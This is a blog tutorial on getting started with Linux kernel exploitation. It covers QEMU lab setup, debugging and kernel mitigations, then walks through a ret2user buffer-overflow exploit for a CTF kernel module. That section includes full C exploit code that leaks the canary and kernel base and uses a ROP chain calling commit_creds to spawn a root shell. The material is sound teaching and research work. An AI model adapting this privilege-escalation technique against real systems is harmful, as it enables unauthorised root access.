santaclz's blog

Linux Kernel Exploitation: Getting started & BOF

03 Nov 2023


Table of contents

  • What are the goals of exploitation?
  • Setup
  • Debugging
  • Shellcoding
  • Kernel modules
  • Mitigations
  • Ret2user
  • Video
  • References



  • Motivation

    I started my journey into the Linux kernel exploitation for the following reasons:

    • To improve my knowledge of Linux kernel
    • Write exploits for real world bugs
    • To research IoT devices with modified Linux kernel
    • Pwn Google’s kCTF platform
    • To get invited to conferences :)

    Where are kernel exploits used?

    Kernel exploits are used (to my knowledge) by the following groups of people:

    • Threat actors: to escalate privileges
    • Pentesters: to demonstrate impact
    • Defenders: coming up with detections and mitigations
    • Kernel / driver developers: to write patches
    • Android / iOS superusers: to customize phones

    Linux kernel oversimplified

    Linux kernel is a layer between user applications and hardware. It manages things like CPU, memory, devices, file system, networking, process control and many other things. It’s a complex project with over 8 million lines of code and it’s still evolving. Such a dynamic project is an ideal research target.

    Kernelspace vs Userspace exploitation (x86_64)

    If you’re coming from userspace exploitation (like me) you may notice the following differences when writing kernel exploits.

    More instructions

    Instructions such as:

    • LGDT - Loads an address of a GDT into GDTR
    • LLDT - Loads an address of a LDT into LDTR
    • LTR - Loads a Task Register into TR
    • MOV Control Register - Copy data and store in Control Registers
    • LMSW - Load a new Machine Status WORD
    • CLTS - Clear Task Switch Flag in Control Register CR0
    • MOV Debug Register - Copy data and store in debug registers
    • INVD - Invalidate Cache without writeback
    • INVLPG - Invalidate TLB Entry
    • WBINVD - Invalidate Cache with writeback
    • HLT - Halt Processor
    • RDMSR - Read Model Specific Registers (MSR)
    • WRMSR - Write Model Specific Registers (MSR)
    • RDPMC - Read Performance Monitoring Counter
    • RDTSC - Read time Stamp Counter

    With exceptions such as RDTSC which can also be run from userspace if TSD flag in register CR4 is not set.

    More registers

    When debugging the kernel with gdb we can see additional registers:

    • fs_base - base address of fs
    • gs_base - base address of gs
    • k_gs_base - stores the value of gs_base register while switching from userspace to kernelspace or vice versa
    • cr0 - control register
    • cr2 - control register
    • cr3 - control register
    • cr4 - control register
    • cr8 - control register
    • efer - Extended Feature Enable Register
    • mxcsr - control and status for SSE registers

    What are the goals of exploitation?

    The goal usually revolves around gaining higher privileges on the system or gaining persistence.

    Some of the goals can be:

    Get root

    • payload: commit_creds(prepare_kernel_cred(0))

    Escape SECCOMP

    • payload: current->thread_info.flags &= ~(1 « TIF_SECCOMP)

    Run single command

    • payload: run_cmd(“/path_to_command”)

    Setup

    Install prerequisites

    sudo apt install -y bison flex libelf-dev cpio build-essential libssl-dev qemu-system-x86 libncurses-dev
    

    Build the Linux kernel with debug symbols

    git clone https://github.com/torvalds/linux # or download specific kernel version from https://mirrors.edge.kernel.org/pub/linux/kernel/
    cd linux && make defconfig && make menuconfig
    # Ensure that kernel hacking --> Compile-time checks and compiler options --> Compile the kernel with debug symbols is checked.
    make -j$(nproc)
    

    Build BusyBox

    Download and decompress busybox (I chose the latest version at the time).

    wget https://busybox.net/downloads/busybox-1.36.1.tar.bz2
    tar xvf busybox-1.36.1.tar.bz2
    

    Build it.

    cd busybox-1.36.1
    make defconfig
    make menuconfig
    

    In the Busybox Settings menu, select Build Options, and check the box next to Build BusyBox as a static binary (no shared libs). Next, specify the output folder.

    make
    make CONFIG_PREFIX=./../busybox_rootfs install
    

    Build initramfs

    Create a directory hierarchy for initramfs.

    mkdir -p initramfs/{bin,dev,etc,home,mnt,proc,sys,usr,tmp}
    cd initramfs/dev
    sudo mknod sda b 8 0 
    sudo mknod console c 5 1
    

    Copy everything from the busybox_rootfs folder to the initramfs folder. Next, create an init file in the root of initramfs, and write the following into it:

    #!/bin/sh
    
    mount -t proc none /proc
    mount -t sysfs none /sys
    
    /bin/mount -t devtmpfs devtmpfs /dev
    chown 1337:1337 /tmp
    
    setsid cttyhack setuidgid 1337 sh
    
    exec /bin/sh
    

    Make the script executable.

    chmod +x init
    

    Create initramfs itself.

    find . -print0 | cpio --null -ov --format=newc > initramfs.cpio 
    gzip ./initramfs.cpio
    

    This will create initramfs.cpio.gz file which we will use as a filesystem for our qemu emulated Linux kernel.

    Run with qemu

    qemu-system-x86_64 \
        -m 512M \
        -nographic \
        -kernel bzImage \
        -append "console=ttyS0 loglevel=3 oops=panic panic=-1 nopti nokaslr" \
        -no-reboot \
        -cpu qemu64 \
        -smp 1 \
        -monitor /dev/null \
        -initrd initramfs.cpio.gz \
        -net nic,model=virtio \
        -net user \
        -gdb tcp::1234 \
        -S
    

    Flag -gdb tcp::1234 sets gdbstub listener on port 1234. The -S flag halts the qemu execution until gdb debugger is connected.

    Debugging

    For debugging run the qemu instance with the -gdb and -S flag. Open gdb in another terminal and write:

    target remote :1234
    

    As for gdb extensions use which ever extension works, I use gef, although most of the things can be accomplished with plain gdb.

    Shellcoding

    If you know what you want to accomplish with code but don’t know how to do it on assembly level, write a kernel module, compile it and dump the assembly.

    objdump -M intel -d test.ko
    

    Kernel modules

    Kernel modules are programs that can be loaded and unloaded into the kernel on the fly without the need to reboot the system. They are a great start for learning kernel exploitation as they run with kernel privileges.

    To load a kernel module you can use:

    sudo insmod <module_name.ko>
    

    To unload a kernel module:

    sudo rmmod <module_name>
    

    To list currently loaded modules:

    lsmod
    

    All kernel modules have a struct called fops (file operations) which specifies which functions are called upon calling read, write, open, close or ioctl functions.

    static struct file_operations module_fops =
    {
        .owner   = THIS_MODULE,
        .read    = module_read,
        .write   = module_write,
        .open    = module_open,
        .release = module_close,
    };
    

    We can start auditing each of these functions in our search for bugs.

    Mitigations

    • KASLR - randomizes base address of the kernel (same as userspace ASLR)
    • FG-KASLR - randomizes base address of every function
    • Kernel Stack Canary - value is placed on the stack before return address, this prevents some buffer overflow attacks (same as userspace)
    • SMEP - Supervisor Mode Execution Prevention prevents executing code stored in userspace from kernelspace
    • SMAP - Supervisor Mode Access Prevention prevents accessing memory from userspace while in kernelspace
    • KPTI - Kernel Page Tables Isolation is a mitigation against Meltdown CPU bug

    More mitigations can be found at https://github.com/a13xp0p0v/linux-kernel-defence-map

    Ret2user

    Let’s take a look at the ret2user technique which is commonly used to escalate privileges. For this example I chose a challenge from K3RN3LCTF 2021 called easy_kernel which can be downloaded here: https://github.com/seal9055/seal9055.github.io/blob/main/docs/kernel/kernel_rop.tar.gz

    Vulnerability analysis

    As I mentioned before, kernel modules are a great way to start learning Linux kernel exploitation. In this challenge we are provided with vulnerable kernel module vuln.ko and we have source code in vuln.c.

    Analyzing s_read function we notice a fixed size message buffer.

    static ssize_t s_read(struct file *file, char __user *ubuf, size_t size, loff_t *offset)
    {
        char message[40];
    
        strcpy(message, "Welcome to this kernel pwn series");
    
        if (raw_copy_to_user(ubuf, message, size) == 0) {
            printk(KERN_ALERT "%ld bytes read by device\n", size);
        }
        else {
            printk(KERN_ALERT "Some error occured in read\n");
        }
    
        return size;
    }
    

    If we read more than 40 chars from the message buffer we have a memory leak. This is useful for bypassing KASLR and Kernel Stack Canaries.

    Analyzing s_write function we notice it’s similar but instead of reading we write values into the buffer.

    static ssize_t s_write(struct file *file, const char __user *ubuf, size_t size, loff_t *offset)
    {
        char buffer[40];
    
        if (raw_copy_from_user(buffer, ubuf, size) == 0) {
            printk(KERN_ALERT "%ld bytes written to device\n", size);
        }
        else {
            printk(KERN_ALERT "Some error occured in write\n");
        }
    
        return size;
    }
    

    Calling this function and passing it more than 40 bytes we can trigger buffer overflow.

    Exploitation

    We have everything we need to start writing an exploit. Since this setup has no libc we can compile the binary statically and pack it into initramfs file system.

    This is the plan for writing an exploit:

    1. Leak Kernel Stack Canary
    2. Leak kernel address to bypass KASLR
    3. Save state for switching context between user-land and kernel-land (save registers for restoring them later)
    4. Write ROP chain to bypass SMEP (Execution Prevention) and trigger buffer overflow
    5. Get shell with system("/bin/sh")
    6. Register SIGSEGV signal handler for KPTI bypass (otherwise the exploit Segfaults which is part of KPTI protection)

    Below is an example of an exploit utilizing ret2user technique and bypassing KASLR, Kernel Stack Canary, SMEP, SMAP, KPTI:

    #include <fcntl.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    
    void spawn_shell() {
        puts("[+] Returned to userland");
    
        if (getuid() == 0) system("/bin/sh");
        else puts("[-] Not root");
    }
    
    unsigned long user_cs, user_ss, user_rflags, user_rsp;
    int main() {
        // KPTI bypass
        signal(SIGSEGV, spawn_shell);
    
        int fd = open("/proc/pwn_device", O_RDWR);
        if (fd < 0) {
            puts("[-] Failed to open device");
            exit(1);
        }
        puts("[+] Opened device");
    
        // Leak
        unsigned long buff[80] = {0};
        read(fd, buff, 64);
    
        unsigned long cookie = buff[5];
        unsigned long base = buff[7] - 0x25de2e;
        printf("[+] Leaked cookie: 0x%lx\n", cookie);
        printf("[+] Leaked base: 0x%lx\n", base);
    
        // Save state
        __asm__(
            ".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_rsp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;"
        );
    
        // Overflow
        unsigned long payload[40] = {[0 ... 39] = 0x4141414141414141};
        int i = 5;
        payload[i] = cookie;
        ++i;
        payload[++i] = base + 0x001778; // pop rdi; ret; 
        payload[++i] = 0x0;
        payload[++i] = base + 0x08c340; // prepare_kernel_cred
        payload[++i] = base + 0x08bf00; // commit_creds
        payload[++i] = base + 0xc00f58; // swapgs; ret; 
        payload[++i] = base + 0x024952; // iretq; ret; 
        payload[++i] = (unsigned long)spawn_shell; // userland rip
        payload[++i] = user_cs;
        payload[++i] = user_rflags;
        payload[++i] = user_rsp;
        payload[++i] = user_ss;
    
        write(fd, payload, sizeof payload);
    
        return 0;
    }
    

    Video

    Below is a video of a talk I gave at BSidesLjubljana in June 2023.

    References

    https://medium.com/@kiky.tokamuro/creating-initramfs-5cca9b524b5a

    https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

    https://sam4k.com/linternals-memory-allocators-0x02/

    https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/

    https://seal9055.com/blog/kernel/return_oriented_programming

    https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development/kernel-page-table-isolation-kpti#kpti-trampoline

    https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628

    https://pwn.college/system-security/kernel-security

    https://github.com/google/syzkaller/

    https://research.nccgroup.com/2018/09/11/ncc-groups-exploit-development-capability-why-and-what/

    https://lwn.net/Articles/824307/

    https://meltdownattack.com/meltdown.pdf

    http://www.brokenthorn.com/Resources/OSDev23.html